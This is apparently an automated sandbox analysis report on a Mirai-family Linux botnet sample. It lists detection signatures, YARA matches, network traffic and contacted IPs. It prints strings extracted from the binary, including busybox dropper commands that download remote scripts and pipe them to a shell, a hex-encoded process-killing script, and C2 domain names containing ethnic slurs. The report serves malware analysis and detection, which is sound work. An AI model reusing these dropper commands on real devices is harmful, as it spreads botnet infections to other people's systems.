Linux Analysis Report
jklx86.elf

Overview

General Information

Sample name: jklx86.elf
Analysis ID: 1543112
MD5: 0da563b12c633877fab4b7bdb96d59cb
SHA1: b1fd6bdde4d86363a5b3f7d4656f5a295c729a4c
SHA256: 1e9b6766855b0b8845f911d33012106e0fcde7f0200f46769cb1dc545b25a350
Tags: elfuser-abuse_ch
Infos:

Detection

Score: 68
Range: 0 - 100
Whitelisted: false

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
Sends malformed DNS queries
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Yara signature match

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: jklx86.elf ReversingLabs: Detection: 57%
Machine Learning detection for sample
Source: jklx86.elf Joe Sandbox ML: detected
Found strings indicative of a multi-platform dropper
Source: jklx86.elf String: /bin/busyboxincorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> >sh .k/bin/busybox wget http:///curl.sh -o- | shGET /dlr. HTTP/1.0
Source: jklx86.elf String: .dThe People's/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/armarm5arm6arm7mipsmpslppcspcsh4/wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"

Networking
barindex
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 45.156.86.24 ports 38241,1,2,3,4,8
Source: global traffic TCP traffic: 185.150.24.67 ports 38241,1,2,3,4,8
Sends malformed DNS queries
Source: global traffic DNS traffic detected: malformed DNS query: chinklabs.dyn. [malformed]
Source: global traffic DNS traffic detected: malformed DNS query: netfags.geek. [malformed]
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.15:36274 -> 185.150.24.67:38241
Source: global traffic TCP traffic: 192.168.2.15:56950 -> 45.156.86.24:38241
Source: unknown TCP traffic detected without corresponding DNS query: 180.31.24.179
Source: unknown TCP traffic detected without corresponding DNS query: 84.241.211.132
Source: unknown TCP traffic detected without corresponding DNS query: 35.50.188.78
Source: unknown TCP traffic detected without corresponding DNS query: 217.21.1.108
Source: unknown TCP traffic detected without corresponding DNS query: 9.14.125.251
Source: unknown TCP traffic detected without corresponding DNS query: 135.238.151.18
Source: unknown TCP traffic detected without corresponding DNS query: 19.29.91.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.25.112.118
Source: unknown TCP traffic detected without corresponding DNS query: 95.226.234.172
Source: unknown TCP traffic detected without corresponding DNS query: 220.179.153.18
Source: unknown TCP traffic detected without corresponding DNS query: 217.138.209.90
Source: unknown TCP traffic detected without corresponding DNS query: 215.3.149.179
Source: unknown TCP traffic detected without corresponding DNS query: 35.105.180.188
Source: unknown TCP traffic detected without corresponding DNS query: 161.205.136.234
Source: unknown TCP traffic detected without corresponding DNS query: 159.214.12.32
Source: unknown TCP traffic detected without corresponding DNS query: 171.112.88.97
Source: unknown TCP traffic detected without corresponding DNS query: 164.193.4.23
Source: unknown TCP traffic detected without corresponding DNS query: 72.55.58.171
Source: unknown TCP traffic detected without corresponding DNS query: 141.246.222.173
Source: unknown TCP traffic detected without corresponding DNS query: 68.41.225.178
Source: unknown TCP traffic detected without corresponding DNS query: 144.66.218.146
Source: unknown TCP traffic detected without corresponding DNS query: 99.83.203.27
Source: unknown TCP traffic detected without corresponding DNS query: 113.151.151.18
Source: unknown TCP traffic detected without corresponding DNS query: 51.229.181.18
Source: unknown TCP traffic detected without corresponding DNS query: 104.5.15.224
Source: unknown TCP traffic detected without corresponding DNS query: 16.254.44.5
Source: unknown TCP traffic detected without corresponding DNS query: 50.36.51.24
Source: unknown TCP traffic detected without corresponding DNS query: 2.247.58.1
Source: unknown TCP traffic detected without corresponding DNS query: 158.53.223.141
Source: unknown TCP traffic detected without corresponding DNS query: 149.173.135.147
Source: unknown TCP traffic detected without corresponding DNS query: 61.202.114.247
Source: unknown TCP traffic detected without corresponding DNS query: 152.132.222.24
Source: unknown TCP traffic detected without corresponding DNS query: 217.201.214.42
Source: unknown TCP traffic detected without corresponding DNS query: 203.209.191.120
Source: unknown TCP traffic detected without corresponding DNS query: 219.61.142.58
Source: unknown TCP traffic detected without corresponding DNS query: 47.217.39.243
Source: unknown TCP traffic detected without corresponding DNS query: 194.146.150.37
Source: unknown TCP traffic detected without corresponding DNS query: 18.150.148.192
Source: unknown TCP traffic detected without corresponding DNS query: 55.61.168.237
Source: unknown TCP traffic detected without corresponding DNS query: 194.155.74.34
Source: unknown TCP traffic detected without corresponding DNS query: 222.31.178.145
Source: unknown TCP traffic detected without corresponding DNS query: 139.75.51.184
Source: unknown TCP traffic detected without corresponding DNS query: 160.64.37.200
Source: unknown TCP traffic detected without corresponding DNS query: 197.27.139.232
Source: unknown TCP traffic detected without corresponding DNS query: 204.121.32.217
Source: unknown TCP traffic detected without corresponding DNS query: 47.17.159.127
Source: unknown TCP traffic detected without corresponding DNS query: 120.67.193.0
Source: unknown TCP traffic detected without corresponding DNS query: 125.193.56.118
Source: unknown TCP traffic detected without corresponding DNS query: 38.34.181.248
Source: unknown TCP traffic detected without corresponding DNS query: 192.222.185.120
Source: global traffic DNS traffic detected: DNS query: chinklabs.dyn
Source: global traffic DNS traffic detected: DNS query: yellowchink.pirate
Source: global traffic DNS traffic detected: DNS query: chinklabs.dyn. [malformed]
Source: global traffic DNS traffic detected: DNS query: netfags.geek. [malformed]
Source: jklx86.elf String found in binary or memory: http:///curl.sh

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: jklx86.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: jklx86.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: jklx86.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: jklx86.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 5774.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 5774.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 5774.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 5774.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 5772.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 5772.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 5772.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 5772.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Source: Initial sample String containing 'busybox' found: /bin/busybox
Source: Initial sample String containing 'busybox' found: usage: busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox hostname PBOC
Source: Initial sample String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample String containing 'busybox' found: /bin/busybox wget http://
Source: Initial sample String containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
Source: Initial sample String containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
Source: Initial sample String containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
Source: Initial sample String containing 'busybox' found: /bin/busyboxincorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> >sh .k/bin/busybox wget http:///curl.sh -o- | shGET /dlr. HTTP/1.0
Source: Initial sample String containing 'busybox' found: .dThe People's/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/armarm5arm6arm7mipsmpslppcspcsh4/wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Yara signature match
Source: jklx86.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: jklx86.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: jklx86.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: jklx86.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 5774.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 5774.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 5774.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 5774.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 5772.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 5772.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 5772.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 5772.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: classification engine Classification label: mal68.troj.linELF@0/0@4/0
Enumerates processes within the "proc" file system
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3241/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3483/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/1732/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/1730/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/1333/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/1695/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3235/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3234/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/5777/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/1617/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/1615/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/917/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3255/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3253/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/1591/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3252/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3251/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3250/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/1623/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/1588/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3249/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/764/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3368/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/1585/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3246/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3488/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/766/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/800/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/888/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/802/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/1509/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/803/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/804/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/1867/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3407/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/1484/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/490/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/1514/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/1634/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/1479/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3379/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/931/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/777/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/1595/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/658/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/779/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/812/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/933/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3419/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3310/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3275/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3274/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3273/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3394/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3272/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/782/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3303/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/1762/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3027/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/1486/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/789/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/1806/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/1660/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3044/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3440/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/793/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/794/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3316/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/796/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/1498/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/1497/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3157/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/1496/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3278/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3399/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3951/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/5615/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/1659/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3332/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3210/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3298/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3055/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3052/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3292/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/1701/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/1666/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3205/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3047/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3201/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/723/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/724/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3687/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/1704/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/1669/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3060/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/1440/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3222/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3188/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3220/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3461/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3064/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3062/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/3183/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/1679/status Jump to behavior
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/850/status Jump to behavior

No Screenshots

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
4.126.218.135
 unknown United States
3356 LEVEL3US false
99.173.54.126
 unknown United States
7018 ATT-INTERNET4US false
190.110.245.18
 unknown Argentina
52312 TVMUSICHOUSEJUJUYAR false
128.84.49.98
 unknown United States
26 CORNELLUS false
52.163.48.207
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
36.132.101.63
 unknown China
56044 CMNET-AS-LIAONINGChinaMobilecommunicationscorporationC false
175.37.190.85
 unknown Australia
4804 MPX-ASMicroplexPTYLTDAU false
176.165.89.222
 unknown France
5410 BOUYGTEL-ISPFR false
213.127.238.101
 unknown Netherlands
6830 LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHolding false
79.7.148.128
 unknown Italy
3269 ASN-IBSNAZIT false
69.255.141.57
 unknown United States
7922 COMCAST-7922US false
196.103.9.23
 unknown Kenya
33771 SAFARICOM-LIMITEDKE false
20.18.44.166
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
200.81.9.76
 unknown Argentina
11664 TechtelLMDSComunicacionesInteractivasSAAR false
42.130.140.16
 unknown China
4249 LILLY-ASUS false
182.223.99.218
 unknown Korea Republic of
17858 POWERVIS-AS-KRLGPOWERCOMMKR false
76.190.97.159
 unknown United States
10796 TWC-10796-MIDWESTUS false
75.11.113.121
 unknown United States
7018 ATT-INTERNET4US false
168.135.154.161
 unknown United States
1221 ASN-TELSTRATelstraCorporationLtdAU false
78.119.22.219
 unknown France
8228 CEGETEL-ASFR false
155.204.123.108
 unknown Netherlands
8698 NationwideBuildingSocietyGB false
184.149.250.177
 unknown Canada
577 BACOMCA false
99.52.243.139
 unknown United States
7018 ATT-INTERNET4US false
111.111.213.170
 unknown Japan 2516 KDDIKDDICORPORATIONJP false
208.29.32.200
 unknown United States
1239 SPRINTLINKUS false
82.208.210.4
 unknown Serbia
13091 PTT-SRBIJA-NETRS false
22.100.242.48
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
78.84.103.236
 unknown Latvia
12578 APOLLO-ASLatviaLV false
109.167.180.229
 unknown Russian Federation
25408 WESTCALL-SPB-ASRU false
196.58.32.172
 unknown Seychelles
37518 FIBERGRIDSC false
17.103.205.205
 unknown United States
714 APPLE-ENGINEERINGUS false
37.75.182.211
 unknown Denmark
43557 ASEMNETDK false
157.227.29.225
 unknown Australia
4704 SANNETRakutenMobileIncJP false
59.241.251.239
 unknown China
2516 KDDIKDDICORPORATIONJP false
111.205.101.191
 unknown China
4808 CHINA169-BJChinaUnicomBeijingProvinceNetworkCN false
94.164.232.26
 unknown Italy
24608 WINDTRE-ASIT false
29.230.251.83
 unknown United States
7922 COMCAST-7922US false
66.182.78.118
 unknown United States
17306 RISE-BROADBANDUS false
96.29.235.22
 unknown United States
10796 TWC-10796-MIDWESTUS false
56.124.37.82
 unknown United States
2686 ATGS-MMD-ASUS false
94.44.177.129
 unknown Hungary
21334 ASN-VODAFONE-HU false
81.171.195.168
 unknown United Kingdom
